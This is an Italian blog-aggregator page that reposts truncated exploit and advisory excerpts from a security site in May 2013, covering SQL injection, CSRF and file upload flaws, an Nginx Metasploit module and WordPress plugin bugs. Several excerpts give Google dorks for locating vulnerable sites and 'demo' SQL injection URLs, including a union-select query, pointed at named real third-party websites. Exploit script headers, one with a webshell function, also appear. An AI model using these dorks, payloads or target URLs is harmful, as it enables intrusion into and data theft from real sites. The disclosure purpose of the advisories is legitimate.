Il Bloggatore

JavaScript Execution in IBM WebSphere DataPower Services

24 maggio 2013 - Fonte: http://www.mondounix.com

SEC Consult Vulnerability Lab Security Advisory < 20130523-0 >
=======================================================================
              title: JavaScript Execution in WebSphere DataPower Services
            product: IBM WebSphere DataPower Integration Appliance XI50
 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0
      fixed version: not available, config changes
         CVE number: CVE-2013-0499
             impact: Low/Medium
           homepage: https://www.ibm.com/
              found: 2013-01-28
                 by: A. Falkenberg
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor/product...

Leggi il seguito »

Nessun commento »

Inserito in 0day, DATAPOWER SERVICES, exploit, IBM WEBSPHERE, IBM WEBSPHERE DATAPOWER SERVICES, Javascript, JAVASCRIPT EXECUTION, linux, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload

24 maggio 2013 - Fonte: http://www.mondounix.com

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0     _                   __           __       __                     1
# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
# 1                  \ \____/ >> Exploit database separated by exploit   0
# 0                   \/___/          type (local, remote,...

Leggi il seguito »

Nessun commento »

Inserito in 0day, ARBITRARY FILE UPLOAD, CMS, cross site request forgery, csrf, exploit, linux, MATTERDAY MARKET, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

AVE.CMS 2.09 Blind SQL Injection

24 maggio 2013 - Fonte: http://www.mondounix.com

#!/usr/bin/env python
 
import urllib, sys, time
 
#######################################################################################
# Exploit Title: AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit
# Date: 23/05/2013
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Vendor Homepage: http://www.overdoze.ru/
# Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09
# Version: V2.09 and 2.09RC2
# Tested on: Linux Debian 2.6.32-5-686
# Description: The "module" parameter is vulnerable to Blind SQL Injection.
# Solution : Update to newest version.
#######################################################################################
 
print "+----------------------------------------------------------+"
print...

Leggi il seguito »

Nessun commento »

Inserito in 0day, AVE, AVE.CMS, blind sql injection, CMS, exploit, metasploit, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

vBulletin 5b SQL Injection

24 maggio 2013 - Fonte: http://www.mondounix.com

#!/usr/bin/perl
###################################################################################
#                                                           Satuday, March 30, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#...

Leggi il seguito »

Nessun commento »

Inserito in 0day, CMS, exploit, metasploit, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, vbulletin, VBULLETIN 5B, Vulnerabilities, Vulnerability, webapps

Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow

23 maggio 2013 - Fonte: http://www.mondounix.com

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
 
    super(update_info(info,
      'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
        The exploit first triggers an integer overflow in the ngx_http_parse_chunked()...

Leggi il seguito »

Nessun commento »

Inserito in 0day, BOF, buffer overflow, CHUNCKED ENCODING, exploit, HTTP SERVER, linux, MondoUnix, nginx, NGINX HTTP SERVER, PHP, remote, Security, Sicurezza, STACK BUFFER OVERFLOW, unix, Vulnerabilities, Vulnerability, webapps

Weyal CMS SQL Injection

23 maggio 2013 - Fonte: http://www.mondounix.com

================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork:  intext:"Designed by Rohi.af"
      intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page:  fullstory.php?id= , countrys.php?countryid= , "check Another pages :)"
 
[+] Vuln:  www.[site].com/[path]/fullstory.php?id=SQLi
      www.[site].com/[path]/countrys.php?id=SQLi
 
[+] Demo:  http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo:  http://www.s-rohi.com/fullstory.php?id=-999...

Leggi il seguito »

Nessun commento »

Inserito in 0day, CMS, exploit, metasploit, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps, WEYAL, WEYAL CMS

WordPress Spider Catalog Multiple Vulnerabilities

22 maggio 2013 - Fonte: http://www.mondounix.com

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
 
Vulnerable is current version 1.4.6, older versions...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, FULL PATH DISCLOSURE, function, linux, MondoUnix, multiple, PHP, REFLECTED XSS, remote, Security, Sicurezza, SPIDER CATALOG, sql injection, SQL-I, STORED XSS, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, XSS

WordPress Spider Event Calendar Multiple Vulnerabilities

22 maggio 2013 - Fonte: http://www.mondounix.com

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.
 
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
 
Vulnerable...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, FULL PATH DISCLOSURE, function, linux, MondoUnix, multiple, PHP, REFLECTED XSS, remote, Security, Sicurezza, SPIDER EVENT CALENDAR, sql injection, SQL-I, STORED XSS, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, XSS

WordPress Flagallery-Skins SQL Injection

22 maggio 2013 - Fonte: http://www.mondounix.com

##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
#...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, FLAGALLERY-SKINS, linux, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, WP-CONTENT

Kimai 0.9.2.1306-3 SQL Injection

22 maggio 2013 - Fonte: http://www.mondounix.com

# Exploit Title: Kimai 0.9.2.1306-3 SQLi
# Date: 05/20/2013
# Exploit Author: drone (@dronesec)
# Vendor Homepage: http://www.kimai.org/
# Software Link: https://downloads.sourceforge.net/project/kimai/0.9.x/kimai.0.9.2.1306-3.zip 
# Version: 0.9.2.1306-3
# Fixed in: source repositories (https://github.com/kimai/kimai)
# Tested on: Windows XP SP3, Ubuntu 12.04 (apparmor disabled)
 
"""
    This doesn't even require authentication to the
    web app, as the file is accessible to any user.
 
    Modify paths accordingly if running against Windows
 
    @dronesec
"""
from argparse import ArgumentParser
import string
import random
import urllib2
import sys
import re
 
def webshell(options,...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, KIMAI, metasploit, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

12 3 4 5 »10 20 30...Ultima »

Sconti e Coupon 100x100 gratuiti
- Iscriviti ai nostri feeds: è gratis! Potrai essere sempre aggiornato su tutte le notizie e le novità provenienti dal mondo informatico! Il tutto IN MODO ASSOLUTAMENTE GRATUITO!!!

Iscriviti gratis alla newsletter

e ricevi una mail al giorno con 20 notizie tratte da
"Il Bloggatore"
Inserisci la tua email:

Ultime Recensioni

I vostri ultimi commenti

Mino: Cerco un film ambientato in un castello, un gruppo di giovani invitati ad una fe...
marco: ilmio numero seriale e M015809 MI POTRESTI TROVARE IL CODICE SBLOCCO GRAZIE...
warts: se scrivete a w a r t s i l a b e a s t @ g m a i l . c o m ricevo le mail...
baby monitor wireles: I blog often and I really thank you for your information. Your article has trul...
inspirational quotes: Howdy! I simply would like to give a huge thumbs up for the good info you might ...

La classifica:
I blog più attivi

Antipixel e Loghi

<a href="http://www.ilbloggatore.com/" title="Il Bloggatore"><img src="http://images.ilbloggatore.com/ilbloggatore.png" border="0" alt="Il Bloggatore" /></a>

Back to Top

Il presente portale è tutelato dallo Studio Legale Maggesi di Roma - Diritto Internet - Diritto Civile - Diritto Societario